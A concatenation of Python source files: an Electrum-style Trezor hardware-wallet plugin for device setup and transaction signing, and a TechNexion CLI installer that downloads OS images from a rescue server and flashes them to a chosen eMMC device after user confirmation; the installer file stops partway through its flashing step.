            ## log the item error

    def sdk_enabled(self):
        # True only while the SDK is active (set during start_sdk).
        return self._sdk_active or False
|
trezor.py | import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
# Import trezorlib if available; otherwise install lightweight stand-ins so
# the rest of this module can still be imported (the plugin then reports
# itself unavailable via TREZORLIB = False).
try:
    import trezorlib
    import trezorlib.transport
    from trezorlib.transport.bridge import BridgeTransport, call_bridge

    from .clientbase import TrezorClientBase

    from trezorlib.messages import (
        Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
        InputScriptType, OutputScriptType, MultisigRedeemScriptType,
        TxInputType, TxOutputType, TxOutputBinType, TransactionType, AmountUnit)

    from trezorlib.client import PASSPHRASE_ON_DEVICE

    TREZORLIB = True
except Exception as e:
    # A plain "trezorlib is not installed" is a normal configuration and
    # not worth a traceback; log anything else.
    if not (isinstance(e, ModuleNotFoundError) and e.name == 'trezorlib'):
        _logger.exception('error importing trezor plugin deps')
    TREZORLIB = False

    class _EnumMissing:
        """Stand-in for a trezorlib enum class: hands out a fresh
        consecutive integer for each attribute name so module-level enum
        references still resolve without trezorlib installed."""

        def __init__(self):
            self.counter = 0
            self.values = {}

        def __getattr__(self, key):
            if key not in self.values:
                self.values[key] = self.counter
                self.counter += 1
            return self.values[key]

    Capability = _EnumMissing()
    BackupType = _EnumMissing()
    RecoveryDeviceType = _EnumMissing()
    AmountUnit = _EnumMissing()

    # Opaque sentinel matching trezorlib.client.PASSPHRASE_ON_DEVICE.
    PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
    """Keystore backed by a Trezor hardware wallet."""

    hw_type = 'trezor'
    device = TREZOR_PRODUCT_KEY

    plugin: 'TrezorPlugin'

    def get_client(self, force_pair=True):
        # Device lookup/pairing is delegated to the plugin.
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # Not supported by this hardware keystore.
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* with the address key at (change, index) *sequence*."""
        client = self.get_client()
        # Full BIP32 path = keystore derivation prefix + "/change/index".
        address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
        msg_sig = client.sign_message(address_path, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Have the device sign *tx* (no-op if it is already complete)."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        for txin in tx.inputs():
            tx_hash = txin.prevout.txid.hex()
            # The device needs each spent tx to verify input amounts.
            if txin.utxo is None:
                raise UserFacingException(_('Missing previous tx.'))
            prev_tx[tx_hash] = txin.utxo
        self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
    """User-chosen options for initializing (creating/recovering) a device."""
    word_count: int                       # seed length in words
    label: str                            # device label shown on screen
    pin_enabled: bool                     # protect device with a PIN
    passphrase_enabled: bool              # enable BIP39 passphrase support
    recovery_type: Any = None             # RecoveryDeviceType, for recovery flow only
    backup_type: int = BackupType.Bip39   # seed backup scheme
    no_backup: bool = False               # create a "no backup" (seedless) device
class TrezorPlugin(HW_PluginBase):
    """Electrum hardware-wallet plugin for Trezor devices (via trezorlib).

    Prefers the Trezor Bridge transport when it is reachable; falls back to
    direct USB/WebUSB enumeration otherwise.
    """
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    # libraries_available, libraries_URL, minimum_firmware,
    # wallet_class, types

    firmware_URL = 'https://wallet.trezor.io'
    libraries_URL = 'https://pypi.org/project/trezor/'
    minimum_firmware = (1, 5, 2)
    keystore_class = TrezorKeyStore
    minimum_library = (0, 13, 0)
    maximum_library = (0, 14)
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    DEVICE_IDS = (TREZOR_PRODUCT_KEY,)

    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        super().__init__(parent, config, name)
        self.libraries_available = self.check_libraries_available()
        if not self.libraries_available:
            return
        self.device_manager().register_enumerate_func(self.enumerate)
        self._is_bridge_available = None  # tri-state cache: None = not probed yet

    def get_library_version(self):
        """Return the installed trezorlib version string.

        Raises LibraryFoundButUnusable when trezorlib is present but failed
        to import cleanly (module-level TREZORLIB flag is False).
        """
        import trezorlib
        try:
            version = trezorlib.__version__
        except Exception:
            version = 'unknown'
        if TREZORLIB:
            return version
        else:
            raise LibraryFoundButUnusable(library_version=version)

    @runs_in_hwd_thread
    def is_bridge_available(self) -> bool:
        # Testing whether the Bridge is available can take several seconds
        # (when it is not), as it is slow to timeout, hence we cache it.
        if self._is_bridge_available is None:
            try:
                call_bridge("enumerate")
            except Exception:
                self._is_bridge_available = False
                # never again try with Bridge due to slow timeout
                BridgeTransport.ENABLED = False
            else:
                self._is_bridge_available = True
        return self._is_bridge_available

    @runs_in_hwd_thread
    def enumerate(self):
        """Return a list of Device records for every reachable Trezor."""
        # If there is a bridge, prefer that.
        # On Windows, the bridge runs as Admin (and Electrum usually does not),
        # so the bridge has better chances of finding devices. see #5420
        # This also avoids duplicate entries.
        if self.is_bridge_available():
            devices = BridgeTransport.enumerate()
        else:
            devices = trezorlib.transport.enumerate_devices()
        return [Device(path=d.get_path(),
                       interface_number=-1,
                       id_=d.get_path(),
                       product_key=TREZOR_PRODUCT_KEY,
                       usage_page=0,
                       transport_ui_string=d.get_path())
                for d in devices]

    @runs_in_hwd_thread
    def create_client(self, device, handler):
        """Open a transport to *device*; return a TrezorClientBase or None."""
        try:
            self.logger.info(f"connecting to device at {device.path}")
            transport = trezorlib.transport.get_transport(device.path)
        except BaseException as e:
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None

        if not transport:
            self.logger.info(f"cannot connect at {device.path}")
            return

        self.logger.info(f"connected to device at {device.path}")
        # note that this call can still raise!
        return TrezorClientBase(transport, handler, self)

    @runs_in_hwd_thread
    def get_client(self, keystore, force_pair=True, *,
                   devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
        # returns the client for a given keystore. can use xpub
        client = super().get_client(keystore, force_pair,
                                    devices=devices,
                                    allow_user_interaction=allow_user_interaction)
        if client:
            client.used()
        return client

    def get_coin_name(self):
        # Coin name passed to the device firmware when signing.
        return "Testnet" if constants.net.TESTNET else "Sapphire"

    def initialize_device(self, device_id, wizard, handler):
        # Initialization method
        # note: single placeholder -> single format argument
        msg = _("Choose how you want to initialize your {}.").format(self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
        ]

        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, device_id)
            t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True  # setDaemon() is deprecated since Python 3.10
            t.start()
            exit_code = wizard.loop.exec_()
            if exit_code != 0:
                # this method (initialize_device) was called with the expectation
                # of leaving the device in an initialized state when finishing.
                # signal that this is not the case:
                raise UserCancelled()

        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)

    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Thread target: run _initialize_device and report the outcome to
        the wizard's event loop through its exit code (0 = success)."""
        exit_code = 0
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            exit_code = 1
        except BaseException as e:
            self.logger.exception('')
            handler.show_error(repr(e))
            exit_code = 1
        finally:
            wizard.loop.exit(exit_code)

    @runs_in_hwd_thread
    def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
        """Run the on-device create/recover flow selected by *method*."""
        if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
            handler.show_error(_(
                "You will be asked to enter 24 words regardless of your "
                "seed's actual length. If you enter a word incorrectly or "
                "misspell it, you cannot change it or go back - you will need "
                "to start again from the beginning.\n\nSo please enter "
                "the words carefully!"),
                blocking=True)

        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if not client:
            raise Exception(_("The device was disconnected."))

        if method == TIM_NEW:
            # 20/33-word entries correspond to SLIP39 share lengths.
            strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
            client.reset_device(
                strength=strength_from_word_count[settings.word_count],
                passphrase_protection=settings.passphrase_enabled,
                pin_protection=settings.pin_enabled,
                label=settings.label,
                backup_type=settings.backup_type,
                no_backup=settings.no_backup)
        elif method == TIM_RECOVER:
            client.recover_device(
                recovery_type=settings.recovery_type,
                word_count=settings.word_count,
                passphrase_protection=settings.passphrase_enabled,
                pin_protection=settings.pin_enabled,
                label=settings.label)
            if settings.recovery_type == RecoveryDeviceType.Matrix:
                handler.close_matrix_dialog()
        else:
            raise RuntimeError("Unsupported recovery method")

    def _make_node_path(self, xpub, address_n):
        """Convert an xpub plus derivation suffix into a trezorlib HDNodePathType."""
        bip32node = BIP32Node.from_xkey(xpub)
        node = HDNodeType(
            depth=bip32node.depth,
            fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
            child_num=int.from_bytes(bip32node.child_number, 'big'),
            chain_code=bip32node.chaincode,
            public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
        )
        return HDNodePathType(node=node, address_n=address_n)

    def setup_device(self, device_info, wizard, purpose):
        """Pair with the device, checking firmware and initializing if needed."""
        device_id = device_info.device.id_
        client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)

        if not client.is_uptodate():
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            raise OutdatedHwFirmwareException(msg)

        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
        wizard.run_task_without_blocking_gui(
            task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
        client.used()
        return client

    def get_xpub(self, device_id, derivation, xtype, wizard):
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub

    def get_trezor_input_script_type(self, electrum_txin_type: str):
        """Map an electrum txin type to the trezorlib InputScriptType enum."""
        if electrum_txin_type in ('p2wpkh', 'p2wsh'):
            return InputScriptType.SPENDWITNESS
        if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return InputScriptType.SPENDP2SHWITNESS
        if electrum_txin_type in ('p2pkh',):
            return InputScriptType.SPENDADDRESS
        if electrum_txin_type in ('p2sh',):
            return InputScriptType.SPENDMULTISIG
        if electrum_txin_type in ('p2tr',):
            return InputScriptType.SPENDTAPROOT
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))

    def get_trezor_output_script_type(self, electrum_txin_type: str):
        """Map an electrum txin type to the trezorlib OutputScriptType enum."""
        if electrum_txin_type in ('p2wpkh', 'p2wsh'):
            return OutputScriptType.PAYTOWITNESS
        if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return OutputScriptType.PAYTOP2SHWITNESS
        if electrum_txin_type in ('p2pkh',):
            return OutputScriptType.PAYTOADDRESS
        if electrum_txin_type in ('p2sh',):
            return OutputScriptType.PAYTOMULTISIG
        if electrum_txin_type in ('p2tr',):
            return OutputScriptType.PAYTOTAPROOT
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))

    def get_trezor_amount_unit(self):
        """Pick the on-device amount unit matching the user's decimal_point setting."""
        if self.config.decimal_point == 0:
            return AmountUnit.SATOSHI
        elif self.config.decimal_point == 2:
            return AmountUnit.MICROBITCOIN
        elif self.config.decimal_point == 5:
            return AmountUnit.MILLIBITCOIN
        else:
            return AmountUnit.BITCOIN

    @runs_in_hwd_thread
    def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
        """Sign *tx* on the device and merge the signatures back into it.

        prev_tx maps hex txid -> previous Transaction; converted here to
        trezorlib TransactionType objects keyed by raw txid bytes.
        """
        prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items()}
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
        outputs = self.tx_outputs(tx, keystore=keystore)
        # do not bind the unused element to "_": that would shadow the
        # gettext translation function imported at module level
        signatures, _signed_tx = client.sign_tx(self.get_coin_name(),
                                                inputs, outputs,
                                                lock_time=tx.locktime,
                                                version=tx.version,
                                                amount_unit=self.get_trezor_amount_unit(),
                                                prev_txes=prev_tx)
        signatures = [(bh2u(x) + '01') for x in signatures]  # append SIGHASH_ALL byte
        tx.update_signatures(signatures)

    @runs_in_hwd_thread
    def show_address(self, wallet, address, keystore=None):
        """Display *address* on the device screen for user verification."""
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        deriv_suffix = wallet.get_address_index(address)
        derivation = keystore.get_derivation_prefix()
        address_path = "%s/%d/%d" % (derivation, *deriv_suffix)
        script_type = self.get_trezor_input_script_type(wallet.txin_type)

        # prepare multisig, if available:
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) > 1:
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pairs = sorted(zip(pubkeys, xpubs))
            multisig = self._make_multisig(
                wallet.m,
                [(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
        else:
            multisig = None

        client = self.get_client(keystore)
        client.show_address(address_path, script_type, multisig)

    def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
        """Convert electrum inputs to trezorlib TxInputType objects.

        When for_sig is True, tx must be a PartialTransaction and per-input
        script type / derivation / multisig information is filled in.
        """
        inputs = []
        for txin in tx.inputs():
            if txin.is_coinbase_input():
                txinputtype = TxInputType(
                    prev_hash=b"\x00"*32,
                    prev_index=0xffffffff,  # signed int -1
                )
            else:
                txinputtype = TxInputType(
                    prev_hash=txin.prevout.txid,
                    prev_index=txin.prevout.out_idx,
                )
                if for_sig:
                    assert isinstance(tx, PartialTransaction)
                    assert isinstance(txin, PartialTxInput)
                    assert keystore
                    if len(txin.pubkeys) > 1:
                        xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
                        txinputtype.multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
                    txinputtype.script_type = self.get_trezor_input_script_type(txin.script_type)
                    my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
                    if full_path:
                        txinputtype.address_n = full_path
                    txinputtype.amount = txin.value_sats()
            txinputtype.script_sig = txin.script_sig
            txinputtype.sequence = txin.nsequence
            inputs.append(txinputtype)
        return inputs

    def _make_multisig(self, m, xpubs):
        """Build a MultisigRedeemScriptType for an m-of-n script (None if n == 1)."""
        if len(xpubs) == 1:
            return None
        pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
        return MultisigRedeemScriptType(
            pubkeys=pubkeys,
            signatures=[b''] * len(pubkeys),
            m=m)

    def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
        """Convert electrum outputs to trezorlib TxOutputType objects.

        At most one of our own change outputs is sent by derivation path so
        the device can hide it from the confirmation screen.
        """

        def create_output_by_derivation():
            script_type = self.get_trezor_output_script_type(txout.script_type)
            if len(txout.pubkeys) > 1:
                xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
                multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
            else:
                multisig = None
            my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
            assert full_path
            txoutputtype = TxOutputType(
                multisig=multisig,
                amount=txout.value,
                address_n=full_path,
                script_type=script_type)
            return txoutputtype

        def create_output_by_address():
            if address:
                return TxOutputType(
                    amount=txout.value,
                    script_type=OutputScriptType.PAYTOADDRESS,
                    address=address,
                )
            else:
                return TxOutputType(
                    amount=txout.value,
                    script_type=OutputScriptType.PAYTOOPRETURN,
                    op_return_data=trezor_validate_op_return_output_and_get_data(txout),
                )

        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)

        for txout in tx.outputs():
            address = txout.address
            use_create_by_derivation = False

            if txout.is_mine and not has_change:
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                # note: ^ restriction can be removed once we require fw
                # that has https://github.com/trezor/trezor-mcu/pull/306
                if txout.is_change == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True

            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation()
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)

        return outputs

    def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
        """Convert a previous Transaction to a trezorlib TransactionType."""
        t = TransactionType()
        if tx is None:
            # probably for segwit input and we don't need this prev txn
            return t
        tx.deserialize()
        t.version = tx.version
        t.lock_time = tx.locktime
        t.inputs = self.tx_inputs(tx)
        t.bin_outputs = [
            TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
            for o in tx.outputs()
        ]
        return t
|
installer.py | # Copyright (c) 2018 TechNexion,Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. The names of the authors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# TECHNEXION, INC. OR ANY CONTRIBUTORS TO THIS SOFTWARE BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# installer:
# The client CLI program for the TechNexion Installer/Rescue system
#
# Author: Po Cheng <po.cheng@technexion.com>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#----------------------------------------------------------
# installer cli
#
# To run the installer cli commands, type in the shell
#
# $ installer.py help
#
# for help usage of the installer cli tool
#
#----------------------------------------------------------
import re
import time
import math
import logging
import subprocess
from threading import Thread, Event
from urllib.parse import urlparse
from defconfig import SetupLogging
from view import CliViewer
SetupLogging('/tmp/installer_cli.log')
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
def _prettySize(n,pow=0,b=1024,u='B',pre=['']+[p+'i'for p in'KMGTPEZY']):
r,f=min(int(math.log(max(n*b**pow,1),b)),len(pre)-1),'{:,.%if} %s%s'
return (f%(abs(r%(-r-1)),pre[r],u)).format(n*b**pow/b**float(r))
def findAttrs(keys, dc):
    """
    For dictionary and dictionary within a dictionary
    """
    # Depth-first walk: yield every (key, value) whose key is in *keys*,
    # recursing into nested dictionaries.
    for key, value in dc.items():
        if key in keys:
            yield (key, value)
        elif isinstance(value, dict):
            yield from findAttrs(keys, value)
def parsePartitionSize(result):
    # Parse the returned partition entries and compute the sector count of
    # partition 1 on the mmcblk device (start + size, padded by one 4 KiB block).
    if not (isinstance(result, dict) and result.get('status') == "success"):
        return None
    for entry in result.values():
        if not isinstance(entry, dict):
            continue
        if entry.get('device_type') != 'partition':
            continue
        if entry.get('sys_number') is None or int(entry['sys_number']) != 1:
            continue
        if 'mmcblk' not in entry.get('sys_name', ''):
            continue
        attrs = entry.get('attributes')
        if not (isinstance(attrs, dict) and 'size' in attrs and 'start' in attrs):
            continue
        # add an additional block, i.e 4096/512
        return int((int(attrs['start']) + int(attrs['size']) + 8) / 4096 * 512)
def parseTargetList(result):
    # Reduce each device entry to just its device_node/size attributes and
    # enumerate the surviving entries for menu display.
    data = {}
    for name, entry in result.items():
        if isinstance(entry, dict):
            data[name] = dict(findAttrs(['device_node', 'size'], entry))
    return [(index, name, attrs) for index, (name, attrs) in enumerate(data.items())]
def parseWebList(result):
    # We know that file_list is a dictionary because we send it from the server
    if 'file_list' in result and isinstance(result['file_list'], dict):
        entries = sorted(result['file_list'].items())
        return [(index, name, info) for index, (name, info) in enumerate(entries)]
def checkUrl(url):
    """Return the urlparse result for *url* if it has both a scheme and a
    network location; otherwise (including malformed input) return None."""
    try:
        parsed = urlparse(url)
    except ValueError:
        # urlparse raises ValueError on malformed input (e.g. a bad port or
        # invalid IPv6 netloc); anything else should propagate rather than
        # be swallowed by a bare except.
        return None
    return parsed if all([parsed.scheme, parsed.netloc]) else None
def crawlWeb(link, result):
    # Recursively walk the rescue server's listing under *link*, collecting
    # every .xz image into *result* as {relative path: full url}.
    viewer = CliViewer()
    print('Search http://rescue.technexion.net{}'.format(link))
    viewer.request({'cmd': 'info', 'target': 'http://rescue.technexion.net', 'location': link })
    entries = parseWebList(viewer.getResult())
    del viewer
    for entry in entries:
        name, url = entry[1], entry[2]
        if name.endswith('/'):
            # Sub-directory: descend if the link is a well-formed URL.
            parsed = checkUrl(url)
            if parsed is not None:
                crawlWeb(parsed.path.replace('/rescue/', '/'), result)
        elif name.endswith('.xz'):
            result.update({link + name: url})
def loopResult(viewer, ev):
    """Poll *viewer* once a second for progress and draw a text progress bar,
    until the *ev* threading.Event is set.

    Fixes: 'total' was previously referenced before assignment (NameError when
    'bytes_written' arrives before any total-size key) and could be zero
    (ZeroDivisionError); it is now initialized and guarded.
    """
    total = 0  # last known total size; persists across poll iterations
    while not ev.wait(1):
        result = viewer.queryResult()
        if 'total_uncompressed' in result:
            total = int(result['total_uncompressed'])
        elif 'total_size' in result:
            total = int(result['total_size'])
        if 'bytes_written' in result and total > 0:
            pcent = float(int(result['bytes_written']) / total)
            hashes = '#' * int(round(pcent * 40))
            spaces = ' ' * (40 - len(hashes))
            outstr = 'Percent: [{}] {}% ({}/{})'.format(hashes + spaces, int(round(pcent * 100)), _prettySize(int(result['bytes_written'])), _prettySize(total))
            print(outstr, end=((' ' * (80 - len(outstr))) + '\r'))
        else:
            print('Processing: ...', end='\r')
def startstop_guiclientd(flag):
    # Start (truthy flag) or stop (falsy flag) the GUI rescue client service.
    action = 'Start' if flag else 'Stop'
    print('{} gui rescue client application...'.format(action))
    subprocess.check_call(['systemctl', action.lower(), 'guiclientd.service'])
def main():
    """Interactive flow: detect the SOM, pick an image and a target storage
    device, back up the on-target rescue system, download+flash the image,
    and reconfigure the mmc boot partition."""
    def parseSOMInfo(path):
        # Split '/<form>-<cpu>/<board>-<display>/<name>.xz' into its groups;
        # returns None when the path does not match.
        p = re.compile('\/(\w+)[_|-](\w+)\/(\w+)-(\w+)\/(.+)\.xz', re.IGNORECASE)
        m = p.match(path)
        if m:
            return m.groups()
    def parseFilename(fname):
        # Split '<os>-<ver>-<extra>' (any part optional) into three fields.
        # NOTE(review): the local name 'os' shadows the imported os module
        # inside this helper — harmless here, but easy to trip over.
        if '-' in fname:
            os, other = fname.split('-', 1)
        else:
            os, other = fname, ''
        if '-' in other:
            ver, extra = other.split('-', 1)
        else:
            ver, extra = other, ''
        return os, ver, extra
    menuResult = {}
    tgtResult = {}
    copyResult = {}
    dlResult = {}
    # step 0: find out the module and baseboard of the target device
    print('Find target device cpu, and form-factor...')
    cliSom = CliViewer()
    cliSom.request({'cmd': 'info', 'target': 'som'})
    if 'found_match' in cliSom.getResult():
        form, cpu, baseboard = cliSom.getResult()['found_match'].split(',')
        if cpu.find('-') != -1: cpu = cpu.split('-',1)[0]
        print('Found: {} {} {}'.format(cpu, form, baseboard))
    else:
        form = cpu = baseboard = '' # same reference
        print('Target Device SOM info not found.')
    # step 1: request for list of download-able files from https://rescue.technexion.net/rescue/
    # spider crawl through the url links to find all .xz files in sub directory links
    print('Crawl through rescue server for xz files...')
    crawlWeb('/', menuResult) # /pico-imx7/pi-070/
    print('Find matching xz files for the target device...')
    # step 2: find menu items that matches as cpu, form, but not baseboard
    # (sorted() materializes a list, so popping from menuResult while
    # iterating is safe here)
    for k, v in sorted(menuResult.items()):
        if (cpu.lower() in k.lower()) and (form.lower() in k.lower()):
            continue
        if not (cpu[0:4].lower() in k.lower()):
            menuResult.pop(k)
        else:
            if form.lower() not in k.lower():
                menuResult.pop(k)
        # NOTE(review): for imx6ul/imx6ull targets this pops every remaining
        # entry, including ones that matched above — confirm intent
        if ('imx6ul' in cpu.lower()) or ('imx6ull' in cpu.lower()):
            if k in menuResult:
                menuResult.pop(k)
    # step 3: ask user to choose the file to download
    menus = [(i, k, v) for i, (k, v) in enumerate(sorted(menuResult.items()))]
    print('{:>4} {:<8} {:<6} {:<8} {:<14} {:<14} {:<10} {:<8}'.format('#', 'cpu', 'form', 'board', 'display', 'os', 'ver', 'size'))
    for menu in menus:
        cliInfo = CliViewer()
        cliInfo.request({'cmd': 'info', 'target': 'http://rescue.technexion.net', 'location': menu[1]})
        if 'total_uncompressed' in cliInfo.getResult():
            uncompsize = int(cliInfo.getResult()['total_uncompressed'])
        elif 'total_size' in cliInfo.getResult():
            uncompsize = int(cliInfo.getResult()['total_size'])
        else:
            uncompsize = 0
        del cliInfo
        if menu[1].endswith('.xz'):
            form, cpu, board, disp, fname = parseSOMInfo(menu[1])
            os, ver, extra = parseFilename(fname.rstrip('.xz'))
            print('{:>4} {:<8} {:<6} {:<8} {:<14} {:<14} {:<10} {:<8}'.format(menu[0], cpu, form, board, disp, os, ver, _prettySize(uncompsize)))
    while True:
        srcNum = input('Choose a file to download ([Q]uit): ')
        if srcNum.isdecimal() and (int(srcNum) >= 0 and int(srcNum) < len(menus)):
            break
        elif srcNum.isalpha() and srcNum.lower() == 'q':
            # restart the GUI client before quitting
            startstop_guiclientd(1)
            exit(1)
        else:
            print('Invalid Inputs')
    # step 4a: get the total number of sectors for first booting partition.
    cliPart = CliViewer()
    cliPart.request({'cmd': 'info', 'target': 'emmc', 'location': 'partition'})
    tgtResult.update(cliPart.getResult())
    partblocks = parsePartitionSize(tgtResult)
    tgtResult.clear()
    del cliPart
    # step 4b: request for list of targets storage device
    cliTgt = CliViewer()
    cliTgt.request({'cmd': 'info', 'target': 'emmc', 'location': 'disk'})
    tgtResult.update(cliTgt.getResult())
    del cliTgt
    # step 5: ask user to choose the target to flash
    targets = parseTargetList(tgtResult)
    print('{:>4} {:<16} {:<24} {:<24}'.format('#', 'name', 'node path', 'disk size'))
    for tgt in targets:
        print('{:>4} {:<16} {:<24} {:<24}'.format(tgt[0], tgt[1], tgt[2]['device_node'], _prettySize(int(tgt[2]['size']) * 512)))
    while True:
        tgtNum = input('Choose a storage to flash ([Q]uit): ')
        if tgtNum.isdecimal() and (int(tgtNum) >= 0 and int(tgtNum) < len(targets)):
            break
        elif tgtNum.isalpha() and tgtNum.lower() == 'q':
            startstop_guiclientd(1)
            exit(1)
        else:
            print('Invalid Inputs')
    # step 6: make up the command to download and flash and execute it
    cliDl = CliViewer()
    # python3 view.py {download -u http://rescue.technexion.net/rescue/pico-imx6/dwarf-070/ubuntu-16.04.xz -t /dev/mmcblk2}
    dlparam = {'cmd': 'download', 'dl_url': menus[int(srcNum)][2], 'tgt_filename': targets[int(tgtNum)][2]['device_node']}
    print("Download {}, and flash to {}".format(menus[int(srcNum)][2], targets[int(tgtNum)][2]['device_node']))
    # print("with cmd: {}".format(dlparam))
    while True:
        yn = input("[Y]es/[N]o ([Q]uit)? ")
        if yn.lower() == 'yes' or yn.lower() == 'y':
            # step 7: backup rescue system on target first
            print('Backup Rescue System on Target Storage first...')
